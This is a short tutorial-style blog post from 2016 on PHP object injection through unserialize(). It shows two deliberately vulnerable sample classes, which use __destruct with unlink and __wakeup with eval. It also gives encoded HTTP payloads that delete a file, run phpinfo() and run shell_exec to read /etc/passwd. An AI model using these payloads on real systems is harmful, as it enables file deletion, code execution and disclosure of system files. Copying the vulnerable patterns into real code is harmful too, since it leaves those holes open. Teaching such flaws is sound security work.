July 27, 2016

Unserialize PHP Exploit Samples


Unserialize PHP exploit is a kind of PHP Object injection. This exploit will occur when a user defined input is not being sanitized properly before being passed to unseriliaze function.

For this exploit to work, you need to take advantage of PHP’s magic methods like __destruct or __wakeup.

See examples below:

For example you have this class named Sample1 with a __desctruct method in it.

class Sample1 {
     private $file;
     public function __construct() {
         // SOME PHP CODES HERE
     }

     public function __destruct() {
         $file = '/tmp/'.$this->file;
         if(file_exists($file)) {
              return unlink($file);
         }
     }
}

// SOME PHP CODE HERE
unserialize($_GET['data']);

As you can see on the example above, the code unserialize’s $_GET['data'] which is a user defined input without any validation. Attacker might be able to delete file using Path Traversal attack.

All we need to do here is set a malicious string on the data parameter to make this exploit work. See malicious payload below.


GET /Sample1.php?data=O%3A8%3A%22Sample1%22%3A1%3A%7Bs%3A14%3A%22%00Sample1%00file%22%3Bs%3A8%3A%22test.txt%22%3B%7D HTTP/1.1
Host: localhost
Cache-Control: no-cache
Postman-Token: token

This particular payload will set Sample1’s $file to test.txt and then trigger the __destruct method which then proceeds to delete test.txt on /tmp directory.

Now check our second example with __wakeup magic method.

class Sample2 {
    private $cmd;
    public function __construct() {
        // SOME PHP CODE
    }

    public function __wakeup() {
        if($this->cmd) {
            eval($this->cmd);
        }
    }
}

// SOME PHP CODE
unserialize($_GET['data']);

In this example, attacker might be able to execute PHP commands by sending a malicious payload. Check payload below.


GET /Sample2.php?data=O%3A7%3A%22Sample2%22%3A1%3A%7Bs%3A12%3A%22%00Sample2%00cmd%22%3Bs%3A10%3A%22phpinfo%28%29%3B%22%3B%7D HTTP/1.1
Host: localhost
Cache-Control: no-cache
Postman-Token: token

This particular payload will simply execute phpinfo();. But with a little tweak on our payload, we can basically do almost everything on their server. Check sample payload below which will display the content of /etc/passwd file.

GET /Sample2.php?data=O%3A7%3A"Sample2"%3A1%3A%7Bs%3A12%3A"%00Sample2%00cmd"%3Bs%3A36%3A"print+shell_exec%28%27cat+%2Fetc%2Fpasswd%27%29%3B"%3B%7D HTTP/1.1
Host: localhost
Cache-Control: no-cache
Postman-Token: token

Basically, with this flaw, the attacker can play GOD Mode on the victims Application. That’s how serious this vulnerability is.

This vulnerability is available on PHP 5.3 and higher.